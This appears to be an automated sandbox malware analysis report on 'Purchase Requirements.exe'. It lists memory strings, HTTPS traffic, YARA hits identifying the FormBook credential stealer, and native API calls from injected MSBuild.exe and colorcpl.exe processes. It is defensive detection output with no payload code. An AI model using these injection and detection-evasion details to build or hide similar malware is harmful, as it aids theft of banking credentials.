          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: Purchase Requirements.exe, 00000000.00000002.688507920.00000000009D0000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.com8
          Source: Purchase Requirements.exe, 00000000.00000002.688507920.00000000009D0000.00000004.00000040.sdmpString found in binary or memory: http://www.fontbureau.comionoB
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: Purchase Requirements.exe, 00000000.00000003.658484040.00000000009DB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/-e5
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: Purchase Requirements.exe, 00000000.00000003.658349095.00000000009DB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnTCr
          Source: Purchase Requirements.exe, 00000000.00000003.658484040.00000000009DB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cna
          Source: Purchase Requirements.exe, 00000000.00000003.658402247.00000000009DB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cna-e5
          Source: Purchase Requirements.exe, 00000000.00000003.658349095.00000000009DB000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cnn-u
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: Purchase Requirements.exe, 00000000.00000002.701682940.0000000005930000.00000002.00000001.sdmp, explorer.exe, 00000008.00000000.717205094.000000000B970000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
          Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49693
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
          Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
          Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
          Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
          Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.769728719.00000000010C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.769097230.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.769766552.00000000010F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.697236239.0000000003CE6000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.920407109.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.919573194.0000000000210000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.920195745.0000000002AF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Initial sample is a PE file and has a suspicious nameShow sources
          Source: initial sampleStatic PE information: Filename: Purchase Requirements.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004181C0 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00418270 NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004182F0 NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004183A0 NtAllocateVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041826C NtReadFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00418215 NtCreateFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_004182EA NtClose,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014299A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014298F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014295D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014297A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014296E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429950 NtQueueApcThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014299D0 NtCreateProcessEx,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0142B040 NtSuspendThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429820 NtEnumerateKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014298A0 NtWriteVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429B00 NtSetValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0142A3B0 NtGetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429A10 NtQuerySection,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429A80 NtOpenDirectoryObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429560 NtWriteFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429520 NtWaitForSingleObject,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0142AD30 NtSetContextThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014295F0 NtQueryInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429760 NtOpenProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429770 NtSetInformationFile,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0142A770 NtOpenThread,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0142A710 NtOpenProcessToken,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429730 NtQueryVirtualMemory,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429650 NtQueryValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429670 NtQueryInformationProcess,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01429610 NtEnumerateValueKey,
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014296D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044595D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044596D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0445B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044598F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044598A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459560 NtWriteFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0445AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044599D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044595F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0445A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0445A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04459730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044597A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0445A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B082F0 NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B08270 NtReadFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B083A0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B081C0 NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B082EA NtClose,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B08215 NtCreateFile,
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02B0826C NtReadFile,
          Source: C:\Users\user\Desktop\Purchase Requirements.exeCode function: 0_2_00504C65
          Source: C:\Users\user\Desktop\Purchase Requirements.exeCode function: 0_2_02739990
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00401030
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041B909
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00408C60
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00408C64
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00402D88
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00402D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0041CE65
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_00402FB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013EF900
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01404120
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014A1002
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013FB090
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_0141EBB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013E0D20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_014B1D55
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01412581
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013FD5E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_013F841F
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 7_2_01406E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044D1002
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442841F
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442B090
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_044E1D55
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0441F900
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04410D20
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04434120
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0442D5E0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_04436E30
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_0444EBB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02AF2FB0
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02AF8C64
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02AF8C60
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02AF2D88
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 15_2_02AF2D90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 013EB150 appears 32 times
          Source: C:\Windows\SysWOW64\colorcpl.exeCode function: String function: 0441B150 appears 32 times
          Source: Purchase Requirements.exe, 00000000.00000002.704034282.0000000006E50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemscorrc.dllT vs Purchase Requirements.exe
          Source: Purchase Requirements.exe, 00000000.00000000.653671470.00000000005C0000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUIPermissionAttribu.exe6 vs Purchase Requirements.exe
          Source: Purchase Requirements.exe, 00000000.00000002.693037255.0000000002851000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameConfigNodeType.dll> vs Purchase Requirements.exe
          Source: Purchase Requirements.exe, 00000000.00000002.707699415.000000000E3A0000.00000002.00000001.sdmpBinary or memory string: originalfilename vs Purchase Requirements.exe
          Source: Purchase Requirements.exe, 00000000.00000002.707699415.000000000E3A0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs Purchase Requirements.exe
          Source: Purchase Requirements.exe, 00000000.00000002.707276265.000000000E2A0000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs Purchase Requirements.exe
          Source: Purchase Requirements.exe, 00000000.00000002.704651839.00000000070A0000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStoreElement.dllB vs Purchase Requirements.exe
          Source: Purchase Requirements.exeBinary or memory string: OriginalFilenameUIPermissionAttribu.exe6 vs Purchase Requirements.exe
